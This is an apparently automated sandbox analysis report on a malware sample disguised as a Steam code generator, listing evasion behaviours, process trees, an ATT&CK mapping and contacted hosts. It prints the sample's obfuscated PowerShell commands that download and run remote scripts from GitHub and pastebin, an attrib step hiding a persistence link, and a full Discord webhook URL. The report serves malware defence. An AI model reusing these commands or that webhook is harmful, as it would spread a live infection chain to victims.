Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 588047
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 590750
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 591110
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3593
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1673
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4226
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2140
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1054
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 613
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4592
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1458
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 970
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5074
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2523
Source: C:\Users\user\Desktop\steamcodegenerator.exe | API coverage: 8.3 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7680 | Thread sleep count: 3593 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7684 | Thread sleep count: 1673 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7728 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7700 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7860 | Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7884 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7816 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7932 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7860 | Thread sleep time: -588047s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7272 | Thread sleep count: 1054 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7308 | Thread sleep count: 613 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5284 | Thread sleep count: 4592 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2032 | Thread sleep count: 1458 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5812 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2180 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4444 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4480 | Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5812 | Thread sleep time: -590750s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1744 | Thread sleep count: 970 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3428 | Thread sleep count: 313 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7300 | Thread sleep count: 192 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7672 | Thread sleep count: 5074 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3052 | Thread sleep count: 2523 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1052 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7752 | Thread sleep count: 38 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 744 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7752 | Thread sleep count: 199 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7752 | Thread sleep count: 63 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7768 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1420 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1052 | Thread sleep time: -591110s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Code function: 0_2_00007FF663560478 FindFirstFileExW,0_2_00007FF663560478
Source: steamcodegenerator.exe, 00000000.00000002.3629347869.0000022AF30DE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: steamcodegenerator.exe, 00000000.00000002.3629347869.0000022AF308D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW(
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Code function: 0_2_00007FF66354998C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF66354998C
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Code function: 0_2_00007FF66356483C GetProcessHeap,0_2_00007FF66356483C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Code function: 0_2_00007FF663549B30 SetUnhandledExceptionFilter,0_2_00007FF663549B30
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Code function: 0_2_00007FF663551D58 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF663551D58
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Code function: 0_2_00007FF6635495DC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF6635495DC

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\steamcodegenerator.exe | NtMapViewOfSection: Indirect: 0x22AF4E1835D
Source: C:\Users\user\Desktop\steamcodegenerator.exe | NtMapViewOfSection: Indirect: 0x22AF4E1889A
Source: C:\Users\user\Desktop\steamcodegenerator.exe | NtUnmapViewOfSection: Indirect: 0x22AF4E1882E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF663568F80 cpuid 0_2_00007FF663568F80
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00007FF663564524
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: EnumSystemLocalesW,0_2_00007FF66355B378
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00007FF663564340
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: GetLocaleInfoW,0_2_00007FF6635643F0
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,0_2_00007FF663563ADC
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: GetLocaleInfoW,0_2_00007FF6635641E8
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00007FF663563FA0
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: GetLocaleInfoW,0_2_00007FF66355B7F8
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: EnumSystemLocalesW,0_2_00007FF663563E38
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: EnumSystemLocalesW,0_2_00007FF663563F08
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft OneDrive\FileSync VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Code function: 0_2_00007FF663549880 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF663549880
MITRE ATT&CK Matrix (one line per tactic; leading digits are the per-technique counts shown in the report's matrix)

Reconnaissance | Gather Victim Identity Information | Credentials | Email Addresses | Employee Names | Gather Victim Network Information | Domain Properties | DNS
Resource Development | Acquire Infrastructure | Domains | DNS Server | Virtual Private Server | Server | Botnet | Web Services
Initial Access | Valid Accounts | Default Accounts | Domain Accounts | Local Accounts | Cloud Accounts | Replication Through Removable Media | External Remote Services
Execution | 111 Windows Management Instrumentation | 2 PowerShell | At | Cron | Launchd | Scheduled Task | Systemd Timers
Persistence | 11 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | Logon Script (Windows) | Login Hook | Network Logon Script | RC Scripts | Startup Items
Privilege Escalation | 11 Process Injection | 1 Abuse Elevation Control Mechanism | 11 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | Network Logon Script | RC Scripts | Startup Items
Defense Evasion | 1 Masquerading | 131 Virtualization/Sandbox Evasion | 11 Process Injection | 1 Abuse Elevation Control Mechanism | 1 DLL Side-Loading | Steganography | Compile After Delivery
Credential Access | OS Credential Dumping | LSASS Memory | Security Account Manager | NTDS | LSA Secrets | Cached Domain Credentials | DCSync
Discovery | 1 System Time Discovery | 131 Security Software Discovery | 1 Process Discovery | 131 Virtualization/Sandbox Evasion | 1 Application Window Discovery | 2 File and Directory Discovery | 33 System Information Discovery
Lateral Movement | Remote Services | Remote Desktop Protocol | SMB/Windows Admin Shares | Distributed Component Object Model | SSH | VNC | Windows Remote Management
Collection | 1 Archive Collected Data | Data from Removable Media | Data from Network Shared Drive | Input Capture | Keylogging | GUI Input Capture | Web Portal Capture
Command and Control | 1 Web Service | 11 Encrypted Channel | 3 Ingress Tool Transfer | 4 Non-Application Layer Protocol | 15 Application Layer Protocol | Multiband Communication | Commonly Used Port
Exfiltration | Exfiltration Over Other Network Medium | Exfiltration Over Bluetooth | Automated Exfiltration | Traffic Duplication | Scheduled Transfer | Data Transfer Size Limits | Exfiltration Over C2 Channel
Impact | Abuse Accessibility Features | Network Denial of Service | Data Encrypted for Impact | Data Destruction | Data Encrypted for Impact | Service Stop | Inhibit System Recovery
Behavior Graph (ID: 1534102, Sample: steamcodegenerator.exe, Start date: 15/10/2024, Architecture: WINDOWS, Score: 96)

Contacted hosts: pastebin.com, raw.githubusercontent.com, 3 other IPs or domains
Sample-level signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 2 other signatures; Connects to a pastebin service (likely for C&C) (pastebin.com)

Process tree recovered from the graph:

steamcodegenerator.exe (started)
  network: objects.githubusercontent.com 185.199.109.133:443 (FASTLYUS, Netherlands); github.com 140.82.121.3:443 (GITHUBUS, United States)
  signatures: Suspicious powershell command line found; Found direct / indirect Syscall (likely to bypass EDR)
  powershell.exe (started)
    signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Suspicious powershell command line found; Powershell creates an autostart link
    powershell.exe (started)
      network: discord.com 162.159.138.232:443 (CLOUDFLARENETUS, United States)
      dropped: C:\ProgramData\...\BeginSync.lnk, MS
      signature: Tries to open files direct via NTFS file id
      conhost.exe (started)
      attrib.exe (started)
  conhost.exe (started)
forfiles.exe (started)
  powershell.exe (started)
    powershell.exe (started)
      network: pastebin.com 172.67.19.24:443 (CLOUDFLARENETUS, United States)
  conhost.exe (started)
forfiles.exe (started)
  powershell.exe (started)
    powershell.exe (started)
  conhost.exe (started)

Source | Detection | Scanner | Label | Link
steamcodegenerator.exe | 42% | ReversingLabs | |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
https://contoso.com/License | 0% | URL Reputation | safe |
https://contoso.com/Icon | 0% | URL Reputation | safe |
https://contoso.com/ | 0% | URL Reputation | safe |
https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
https://oneget.orgX | 0% | URL Reputation | safe |
https://aka.ms/pscore68 | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
https://oneget.org | 0% | URL Reputation | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
discord.com | 162.159.138.232 | true | true | - | unknown
github.com | 140.82.121.3 | true | false | - | unknown
raw.githubusercontent.com | 185.199.109.133 | true | true | - | unknown
objects.githubusercontent.com | 185.199.109.133 | true | false | - | unknown
pastebin.com | 172.67.19.24 | true | true | - | unknown
Name | Malicious | Antivirus Detection | Reputation
https://github.com/user-attachments/files/17267811/stm.txt | false | - | unknown
http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt | false | - | unknown
https://discord.com/api/webhooks/1295171900019966004/KRGDAVzqdqMZILdh_WVWyqLwT2_aVjXOXnoEnaoZ5xZY_kNOmMNm2yrdQTKMOzXSXWSI | true | - | unknown
https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt | false | - | unknown
http://pastebin.com/raw/sA04Mwk2 | false | - | unknown
https://pastebin.com/raw/sA04Mwk2 | false | - | unknown
https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt | false | - | unknown
